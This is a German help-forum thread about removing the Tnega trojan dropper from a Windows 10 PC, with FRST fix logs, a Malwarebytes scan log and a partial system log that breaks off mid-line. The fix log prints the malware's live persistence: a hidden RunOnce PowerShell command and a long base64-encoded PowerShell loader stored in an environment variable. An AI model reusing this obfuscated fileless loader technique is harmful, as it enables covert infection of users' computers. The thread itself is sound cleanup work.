![]() |
In Windows 10 TrojanDropper:Win64/Tnega!MSR Windows Defender findet seit ein paar Tagen bei jedem Start des PC den TrojanDropper:Win64/Tnega!MSR. Die Meldung lautet dann zwar Bedrohung gelöscht aber diese taucht wieder auf. Ich hoffe ihr könnt helfen diese Bedrohung dauerhaft zu löschen. Code: # ------------------------------- Code: Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 05-01-2021 Code: Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-01-2021 |
:hallo: Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen. Ich analysiere gerade dein System und melde mich in Kürze mit weiteren Anweisungen. |
Schritt 1
Schritt 2 Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Schritt 3
Bitte poste mit deiner nächsten Antwort:
|
Ich bin gestern leider nicht mehr dazugekommen, hier nun die Angaben Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-01-2021 durchgeführt von uneut (07-01-2021 19:59:31) Run:1 Gestartet von C:\Users\uneut\Desktop Geladene Profile: uneut Start-Modus: Normal ============================================== fixlist Inhalt: ***************** CloseProcesses: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\RunOnce: [Application Restart #0] => C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session -- hxxp://r.finanztip.de/lnk/AS4AAEtwSawAA (Der Dateneintrag hat 285 mehr Zeichen). HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\RunOnce: [uneut] => powershell -Win Hi -Command "$r = [Environment]::GetEnvironmentVariable('uneut', 'User').split();$p=$r[0];$r[0]='';Start-Process $p -ArgumentList ($r -join ' ') -Win Hi" <==== ACHTUNG Task: {D636A1B3-1F46-4996-9817-C1074C8B8793} - \Microsoft\Windows\UNP\RunCampaignManager -> Keine Datei <==== ACHTUNG S2 HP Comm Recover; "C:\Program Files\HPCommRecovery\HPCommRecovery.exe" [X] S2 HPJumpStartBridge; "C:\Program Files (x86)\HP\HP JumpStart Bridge\HPJumpStartBridge.exe" [X] S2 HPTouchpointAnalyticsService; "C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe" [X] CMD: reg query HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Software CMD: reg query HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Environment /S CMD: ipconfig /flushdns CMD: netsh winsock reset CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: Bitsadmin /Reset /Allusers powershell: Set-MpPreference -PUAProtection Enabled Hosts: RemoveProxy: SystemRestore: On EmptyTemp: ***************** Prozesse erfolgreich geschlossen. HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => erfolgreich entfernt HKLM\SOFTWARE\Policies\Microsoft\Edge => erfolgreich entfernt "HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Application Restart #0" => erfolgreich entfernt "HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\\uneut" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D636A1B3-1F46-4996-9817-C1074C8B8793}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D636A1B3-1F46-4996-9817-C1074C8B8793}" => erfolgreich entfernt "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => nicht gefunden HKLM\System\CurrentControlSet\Services\HP Comm Recover => erfolgreich entfernt HP Comm Recover => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\HPJumpStartBridge => erfolgreich entfernt HPJumpStartBridge => Dienst erfolgreich entfernt HKLM\System\CurrentControlSet\Services\HPTouchpointAnalyticsService => erfolgreich entfernt HPTouchpointAnalyticsService => Dienst erfolgreich entfernt ========= reg query HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Software ========= HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\ACD Systems HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Adobe HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\AM HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\AppDataLow HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Buhl Data Service HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Buhl Data Service GmbH HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Canon HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Chromium HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Clients HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Garmin HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Google HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\GPL Ghostscript HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Hewlett-Packard HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\HP HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\HP PC Hardware Diagnostics Windows HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Intel HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Local AppWizard-Generated Applications HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Microsoft HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Mozilla HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Netscape HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\ODBC HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\PDF24 HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\PDFPrint HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Policies HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\QtProject HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Realtek HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\RegisteredApplications HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Samsung HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Synaptics HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\SyncEngines HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\uneut HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\uneut1 HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\UpdateDownloadTool HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Visan HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Wondershare HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Wow6432Node HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Software\Classes ========= Ende von CMD: ========= ========= reg query HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\Environment /S ========= HKEY_USERS\S-1-5-21-2944501838-1900832206-3035373412-1001\Environment Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps; TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp OneDrive REG_EXPAND_SZ C:\Users\uneut\OneDrive OneDriveConsumer REG_EXPAND_SZ C:\Users\uneut\OneDrive uneut REG_SZ "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -En "PAAjACAAdABqAHUAaQBpAHEAaABoACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArA CkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB 5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAY QByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGI AeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7A CAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJAB pACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAX QA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQ AYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkA GUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== " ========= Ende von CMD: ========= ========= ipconfig /flushdns ========= Windows-IP-Konfiguration Der DNS-Aufl”sungscache wurde geleert. ========= Ende von CMD: ========= ========= netsh winsock reset ========= Der Winsock-Katalog wurde zurckgesetzt. Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen. ========= Ende von CMD: ========= ========= netsh advfirewall reset ========= OK. ========= Ende von CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= OK. ========= Ende von CMD: ========= ========= Bitsadmin /Reset /Allusers ========= BITSADMIN version 3.0 BITS administration utility. (C) Copyright Microsoft Corp. 0 out of 0 jobs canceled. ========= Ende von CMD: ========= ========= Set-MpPreference -PUAProtection Enabled ========= ========= Ende von Powershell: ========= C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben Hosts erfolgreich wiederhergestellt. ========= RemoveProxy: ========= "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt "HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt "HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt ========= Ende von RemoveProxy: ========= SystemRestore: On => abgeschlossen =========== EmptyTemp: ========== BITS transfer queue => 10510336 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 100650708 B Java, Flash, Steam htmlcache => 1173 B Windows/system/drivers => 6613161 B Edge => 20055925 B Chrome => 42883090 B Firefox => 11869768 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 6656 B Users => 6656 B ProgramData => 6656 B Public => 6656 B systemprofile => 6656 B systemprofile32 => 6656 B LocalService => 13312 B NetworkService => 86164 B defaultuser0 => 92820 B uneut => 4756546 B RecycleBin => 0 B EmptyTemp: => 188.4 MB temporäre Dateien entfernt. ================================ Das System musste neu gestartet werden. ==== Ende von Fixlog 20:00:18 ==== Malwarebytes www.malwarebytes.com -Protokolldetails- Scan-Datum: 07.01.21 Scan-Zeit: 20:12 Protokolldatei: 401b8b96-511c-11eb-a18e-000000000000.json -Softwaredaten- Version: 4.3.0.98 Komponentenversion: 1.0.1130 Version des Aktualisierungspakets: 1.0.35367 Lizenz: Testversion -Systemdaten- Betriebssystem: Windows 10 (Build 19041.685) CPU: x64 Dateisystem: NTFS Benutzer: DESKTOP-SU91660\uneut -Scan-Übersicht- Scan-Typ: Bedrohungs-Scan Scan gestartet von: Manuell Ergebnis: Abgeschlossen Gescannte Objekte: 304322 Erkannte Bedrohungen: 9 In die Quarantäne verschobene Bedrohungen: 9 Abgelaufene Zeit: 3 Min., 30 Sek. -Scan-Optionen- Speicher: Aktiviert Start: Aktiviert Dateisystem: Aktiviert Archive: Aktiviert Rootkits: Aktiviert Heuristik: Aktiviert PUP: Erkennung PUM: Erkennung -Scan-Details- Prozess: 0 (keine bösartigen Elemente erkannt) Modul: 0 (keine bösartigen Elemente erkannt) Registrierungsschlüssel: 3 PUP.Optional.Reimage, HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\Fixer - Windows Problem Relief., Löschen bei Neustart, 7965, 709541, 1.0.35367, , ame, , , RiskWare.Script.MZreg, HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\SOFTWARE\uneut1, Löschen bei Neustart, 16671, 884748, 1.0.35367, , ame, , , PUP.Optional.StartFenster, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\djhangopedggnlnicpbjklghlckmndge, Löschen bei Neustart, 8265, 354303, 1.0.35367, , ame, , , Registrierungswert: 4 PUM.Optional.DisableMRT, HKLM\SOFTWARE\WOW6432NODE\POLICIES\MICROSOFT\MRT|DONTREPORTINFECTIONINFORMATION, Löschen bei Neustart, 13144, 676881, 1.0.35367, , ame, , , RiskWare.Script.MZreg, HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\SOFTWARE\uneut1|0, Löschen bei Neustart, 16671, 884748, 1.0.35367, , ame, , , PUM.Optional.DisableMRT, HKLM\SOFTWARE\POLICIES\MICROSOFT\MRT|DONTREPORTINFECTIONINFORMATION, Löschen bei Neustart, 13144, 676881, 1.0.35367, , ame, , , PUP.Optional.StartFenster, HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|DJHANGOPEDGGNLNICPBJKLGHLCKMNDGE, Löschen bei Neustart, 8265, 354303, , , , , , Registrierungsdaten: 0 (keine bösartigen Elemente erkannt) Daten-Stream: 0 (keine bösartigen Elemente erkannt) Ordner: 1 PUP.Optional.StartFenster, C:\USERS\UNEUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Extensions\DJHANGOPEDGGNLNICPBJKLGHLCKMNDGE, Löschen bei Neustart, 8265, 354303, , , , , , Datei: 1 PUP.Optional.StartFenster, C:\USERS\UNEUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Ersetzt, 8265, 354303, , , , , 7FC2B64724A60B7F053A2BDF6E932DEE, 70074035BD20CCD1E3A8D79AEE1A1FE734BD0C94DCFF75FEDAE514169AD75BDE Physischer Sektor: 0 (keine bösartigen Elemente erkannt) WMI: 0 (keine bösartigen Elemente erkannt) (end) FRST Logfile: Code: Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 05-01-2021 Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 05-01-2021 durchgeführt von uneut (07-01-2021 20:20:56) Gestartet von C:\Users\uneut\Desktop Windows 10 Home Version 20H2 19042.685 (X64) (2020-09-26 15:22:43) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-2944501838-1900832206-3035373412-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-2944501838-1900832206-3035373412-503 - Limited - Disabled) defaultuser0 (S-1-5-21-2944501838-1900832206-3035373412-1000 - Limited - Disabled) => C:\Users\defaultuser0 Gast (S-1-5-21-2944501838-1900832206-3035373412-501 - Limited - Disabled) uneut (S-1-5-21-2944501838-1900832206-3035373412-1001 - Administrator - Enabled) => C:\Users\uneut WDAGUtilityAccount (S-1-5-21-2944501838-1900832206-3035373412-504 - Limited - Disabled) ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) ACDSee Photo Studio Professional 2018 (64-bit) (HKLM\...\{1137BB4F-4D0B-4CBA-962A-79EFECD36B3F}) (Version: 11.2.0.889 - ACD Systems International Inc.) ACDSee Photo Studio Ultimate 2020 (HKLM\...\{EB2BD38F-44CF-46BB-A00B-72D7FD826A24}) (Version: 13.0.2.2059 - ACD Systems International Inc.) ACDSee Pro 10 (64-bit) (HKLM\...\{13E67D9D-8F6F-4709-B380-A04EC12343E7}) (Version: 10.4.0.686 - ACD Systems International Inc.) ACDSee Video Converter Pro 5 (HKLM-x32\...\ACDSee_acdVCPro5) (Version: 5.0.0.799 - ACD Systems International Inc.) ACDSee Video Studio 4 (HKLM\...\{1246091C-8D24-41EC-9829-6C63E3FDFB03}) (Version: 4.0.1.1013 - ACD Systems International Inc.) Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated) Adobe Digital Editions 4.5 (HKLM-x32\...\Adobe Digital Editions 4.5) (Version: 4.5.10 - Adobe Systems Incorporated) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) Canon CanoScan LiDE 220 On-screen Manual (HKLM-x32\...\Canon CanoScan LiDE 220 On-screen Manual) (Version: 7.7.1 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.11.1 - Canon Inc.) Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.) CanoScan LiDE 220 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ4811) (Version: 1.02 - Canon Inc.) Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.88 - Google LLC) Google Earth Pro (HKLM\...\{FB8010D4-05F4-420D-8DFC-2F911A6DD100}) (Version: 7.3.3.7786 - Google) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden HP Audio Switch (HKLM-x32\...\{0C5D69BD-B518-46DB-8471-506CD27F9478}) (Version: 1.0.138.0 - HP Inc.) HP Deskjet 2540 series - Grundlegende Software für das Gerät (HKLM\...\{333E22D7-9F56-4482-A13C-1B9D35B9D641}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) HP Deskjet 2540 series Hilfe (HKLM-x32\...\{B3E5B153-CC4B-40F2-9802-288B0AF2A966}) (Version: 30.0.0 - Hewlett Packard) HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.) HP ePrint SW (HKLM-x32\...\{5b1a1d22-bd59-44e0-a954-e2f18ec43a23}) (Version: 5.2.20454 - HP Inc.) HP JumpStart Launch (HKLM-x32\...\{859F3766-ABD1-44BF-A99C-2541B451306A}) (Version: 1.1.217.0 - HP Inc.) HP PC Hardware Diagnostics Windows (HKLM-x32\...\{DF16F6E3-6550-468A-9C0C-306B4F60D501}) (Version: 1.5.8.0 - HP Inc.) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP) HP Support Solutions Framework (HKLM-x32\...\{11B7269C-6904-485C-9875-F23AAE32E671}) (Version: 12.18.34.21 - HP Inc.) HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.14 - HP Inc.) HP Universal Camera Driver (HKLM-x32\...\{8B204728-0D90-48BE-97C0-BBEDDFDFA83C}) (Version: 3.6.8.0 - SunplusIT) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.2.11000.2996 - Intel Corporation) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.7.0.1069 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 22.20.16.4836 - Intel Corporation) Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1633.3 - Intel Corporation) Intel(R) Trusted Connect Service Client x86 (HKLM-x32\...\{C9552825-7BF2-4344-BA91-D3CD46F4C441}) (Version: 1.47.866.0 - Intel Corporation) Hidden Intel(R) Trusted Connect Services Client (HKLM-x32\...\{246c6cc0-9810-4728-9a29-28474de2eec5}) (Version: 1.47.866.0 - Intel Corporation) Hidden Intel(R) Virtual Buttons (HKLM-x32\...\1992736F-C90A-481C-B21B-EE34CAD07387) (Version: 1.1.0.21 - Intel Corporation) Intel(R) Wireless Bluetooth(R) (HKLM-x32\...\{8C739F03-60D4-45DE-96FE-6A18D943826F}) (Version: 19.11.1641.0703 - Intel Corporation) Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{bb0592a7-5772-4736-9d55-2402740085db}) (Version: 10.1.1.38 - Intel(R) Corporation) Hidden Intel® Integrated Sensor Solution (HKLM-x32\...\{15ad5a7e-dc2e-4e2f-b79f-bba25548dac9}) (Version: 3.10.100.3821 - Intel Corporation) Intel® PROSet/Wireless Software (HKLM-x32\...\{f8c930bd-0a68-425f-8c11-87723d1e2c97}) (Version: 20.90.0 - Intel Corporation) ISS_Drivers_x64 (HKLM\...\{DB98953E-9708-4AFA-9DB9-7647C08AE6B6}) (Version: 3.10.100.3821 - Intel Corporation) Hidden Malwarebytes version 4.3.0.98 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.0.98 - Malwarebytes) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.66 - Microsoft Corporation) Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - ) Microsoft Office Home and Student 2016 - de-de (HKLM\...\HomeStudentRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2944501838-1900832206-3035373412-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{e6e75766-da0f-4ba2-9788-6ea593ce702d}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23506 (HKLM-x32\...\{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}) (Version: 14.0.23506.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation) Mozilla Firefox 56.0.1 (x64 de) (HKLM\...\Mozilla Firefox 56.0.1 (x64 de)) (Version: 56.0.1 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 56.0.1 - Mozilla) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden PDF24 Creator 9.2.2 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.2 - PDF24.org) PlayMemories Camera Apps Downloader (HKLM-x32\...\{5C42BF1B-4586-4711-81A7-8D0F890A6A31}) (Version: 1.2.0.13221 - Sony Corporation) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8095 - Realtek Semiconductor Corp.) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.63.0 - Samsung Electronics Co., Ltd.) Thunderbolt(TM) Software (HKLM-x32\...\{F55C97BF-D9B2-4BB6-B16A-25A621BC50E9}) (Version: 16.2.52.250 - Intel Corporation) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F14FB68A-9188-4036-AD0D-D054BC9C9291}) (Version: 2.59.0.0 - Microsoft Corporation) VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN) Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.54.1 (HKLM\...\VulkanRT1.0.54.1) (Version: 1.0.54.1 - Intel Corporation Inc.) Hidden Vulkan Run Time Libraries 1.0.54.1 (HKLM\...\VulkanRT1.0.54.1-2) (Version: 1.0.54.1 - Intel Corporation Inc.) Hidden Vulkan Run Time Libraries 1.0.54.1 (HKLM\...\VulkanRT1.0.54.1-3) (Version: 1.0.54.1 - Intel Corporation Inc.) Hidden Vulkan Run Time Libraries 1.0.54.1 (HKLM\...\VulkanRT1.0.54.1-4) (Version: 1.0.54.1 - Intel Corporation Inc.) WISO steuer:Sparbuch 2017 (HKLM-x32\...\{F6061824-9B22-498B-8461-34A67E00C2DC}) (Version: 24.06.1633 - Buhl Data Service GmbH) WISO steuer:Sparbuch 2018 (HKLM-x32\...\{022E8277-E3F5-4CBB-A3CD-B00CCFAB4693}) (Version: 25.07.1727 - Buhl Data Service GmbH) WISO steuer:Sparbuch 2019 (HKLM-x32\...\{35578536-1A0A-49FA-AE0A-EA82C5415D55}) (Version: 26.03.1728 - Buhl Data Service GmbH) WISO steuer:Sparbuch 2020 (HKLM-x32\...\{300B02EF-8DF0-4451-817B-0DAC5291A630}) (Version: 27.00.1484 - Buhl Data Service GmbH) Packages: ========= Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-10-10] (Microsoft Corporation) Ghostery – datenschutzorientierter Werbeblocker -> C:\Program Files\WindowsApps\Ghostery.Ghostery_8.4.6.0_neutral__kzkqe0pn505dg [2020-01-01] (Ghostery) HP JumpStart -> C:\Program Files\WindowsApps\AD2F1837.HPJumpStart_1.2.228.0_x64__v10z8vjag6ke6 [2017-05-13] (HP Inc.) HP LOUNGE -> C:\Program Files\WindowsApps\UniversalMusicMobile.HPLOUNGE_2.1.1.0_x64__3ms5eyejfeart [2017-05-13] (Universal Music Mobile) HP Smart -> C:\Program 